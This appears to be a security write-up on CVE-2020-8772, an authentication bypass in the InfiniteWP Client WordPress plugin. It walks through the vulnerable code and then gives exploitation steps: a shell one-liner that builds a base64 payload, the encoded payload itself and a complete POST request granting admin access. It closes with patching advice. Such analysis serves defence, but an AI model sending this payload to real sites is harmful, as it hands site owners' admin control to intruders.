Critical Authentication Bypass Vulnerability in InfiniteWP Client Plugin

June 30, 2024

Vulnerability Overview

The InfiniteWP Client plugin, versions 1.9.4.4 or earlier, is vulnerable to a critical authentication bypass vulnerability (CVE-2020-8772). This plugin allows WordPress site owners to manage multiple sites from a central server. The vulnerability enables attackers to authenticate to the WordPress installation without proper credentials, potentially leading to unauthorized access and control over the site. 

Exploiting this vulnerability does not require the attacker to have the InfiniteWP server installed. By crafting a request to the InfiniteWP Client plugin, attackers can trick the authentication logic into granting administrative access, bypassing the need for valid credentials. This could allow them to perform malicious actions such as modifying site content, installing malware, or taking control of the entire site.

  • Plugin Name: InfiniteWP Client
  • Affected Versions: Up to and including version 1.9.4.4
  • CVE ID: CVE-2020-8772 
  • CVSS Score: 9.8 (Critical)

Technical Details

The InfiniteWP Client plugin for WordPress, which enables centralized management of multiple WordPress sites, suffers from a critical authentication bypass vulnerability. This vulnerability, identified as CVE-2020-8772, allows attackers to log in as administrators, without proper authentication.

The issue arises due to improper validation of authentication requests within the InfiniteWP Client plugin. Specifically, the vulnerability resides in the iwp_mmb_set_request function located in the init.php file. This function fails to adequately verify the authenticity of certain requests, allowing unauthorized access under specific conditions.

Vulnerable Function: iwp_mmb_set_request

Here is the part of the  iwp_mmb_set_request function that contains a vulnerability leading to authentication bypass. Let's dissect why this vulnerability exists and how it can be exploited.


if(isset($params['username']) && !is_user_logged_in()){
    $user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by('login', $params['username']);
    if (isset($user) && isset($user->ID)) {
        wp_set_current_user($user->ID);
        // Compatibility with All In One Security
        update_user_meta($user->ID, 'last_login_time', current_time('mysql'));
    }
    $isHTTPS = (bool)is_ssl();
    if($isHTTPS){
        wp_set_auth_cookie($user->ID);
    } else {
        wp_set_auth_cookie($user->ID, false, false);
        wp_set_auth_cookie($user->ID, false, true);
    }
}

Key Issues Leading to Authentication Bypass

Insufficient Validation of Input Parameters: The code checks if the username parameter is set and if the user is not logged in. However, it does not validate the source or authenticity of the request. Any request with a username parameter will be processed.

Lack of Authentication Verification: The code does not verify that the incoming request is from a legitimate, authenticated source. There are no nonce or token checks to ensure that the request is authorized.

Direct User Impersonation: The function wp_set_current_user($user->ID) sets the current user to the user ID obtained from the username parameter without verifying that the requestor has the right to impersonate this user.

Setting Authentication Cookies: After setting the current user, the code sets authentication cookies (wp_set_auth_cookie($user->ID)) for the specified user ID. This action effectively logs in the user without requiring valid credentials.

If an attacker supplies "admin" as the user and "admin" is the admin user in WordPress, here's a detailed step-by-step breakdown of how the code executes and results in authentication bypass:

1. The code checks if the username parameter is present and the user is not already logged in. Since the attacker is not logged in and has provided the username         parameter, this condition is true.


if(isset($params['username']) && !is_user_logged_in())

 2. The next part of the code retrieves the user object for the provided username ("admin"). Assuming "admin" exists, $user will now hold the user object for the admin        user.


$user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by('login', $params['username']);

3. After that, it checks if the user object and user ID are valid. 


if (isset($user) && isset($user->ID)) {

 4. Since "admin" is a valid user, this condition is true and then it sets the current user to the retrieved user (admin).


wp_set_current_user($user->ID);

 5. The above code effectively sets the global user context to the admin user. Then it updates the user's last login time for compatibility with the All In One Security      plugin.


update_user_meta($user->ID, 'last_login_time', current_time('mysql'));

 6. The next part of the code checks if the connection is over HTTPS.


$isHTTPS = (bool)is_ssl();

 

7. Assuming the site is not using HTTPS, $isHTTPS will be false. So the following code sets the authentication cookies for the admin user. Since it's not HTTPS, it sets      both secure and non-secure cookies.


if($isHTTPS){
    wp_set_auth_cookie($user->ID);
} else {
    wp_set_auth_cookie($user->ID, false, false);
    wp_set_auth_cookie($user->ID, false, true);
}

This sets the cookies necessary to authenticate as the admin user. With the admin user set and authentication cookies in place, the attacker can now access the site with admin privileges.

Exploitation: 

To exploit the CVE-2020-8772 vulnerability in the InfiniteWP Client plugin, follow these steps:

1. Inspect the web application:

   - Scan the wordpress website to see if the InfiniteWP client plugin is installed and also  

     check if  the version is <=1.9.4.4 . 

2. Intercept the request of home page :

   - Use Burp Suite to intercept the request to the target website

3. Change the method:

   - Use the right-click menu to select "Change request method" in order to change the request's format from GET to POST.

4. Create JSON payload:

   - Create the JSON payload with base64 encoding for the authentication bypass:


echo -n '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 | tr -d '=' | tr '/+' '_-'

  

5. Craft the Exploit:

   - Append the base64-encoded payload with the String mentioned in the exploit URL:


_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo

6. Append the exploit:

- Add this above payload on the body of the intercepted request. The request should look like this:


POST / HTTP/1.1
Host: wordpress_site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

7. Forward the Modified Request:

   - Click on Forward in Burp Suite to send the modified request to the server. Now check the browser, you’ll get something like this

Once you have completed these steps, then navigate to the homepage of the target website. The attack should be successful, and the attacker will have access to the admin dashboard.

By following these steps, an attacker can exploit the CVE-2020-8772 vulnerability in the InfiniteWP Client plugin to bypass authentication and gain unauthorized access to the WordPress site.

Recommendations: 

      1. Update the Plugin:

  • Ensure that you are using the latest version of the InfiniteWP Client plugin (version 1.9.4.5 or higher). Developers often release security patches in newer versions.
  • Regularly check for plugin updates and apply them promptly.

      2.  Restrict Access to the Plugin:

  • Limit access to the InfiniteWP Client plugin to trusted IP addresses or specific user roles.
  • Avoid exposing the plugin’s functionality to unauthenticated users.

References: 

https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/

https://wpscan.com/vulnerability/fac62d36-0fa1-4b43-8f5c-bddbd0cff140/

https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/

https://nvd.nist.gov/vuln/detail/CVE-2020-8772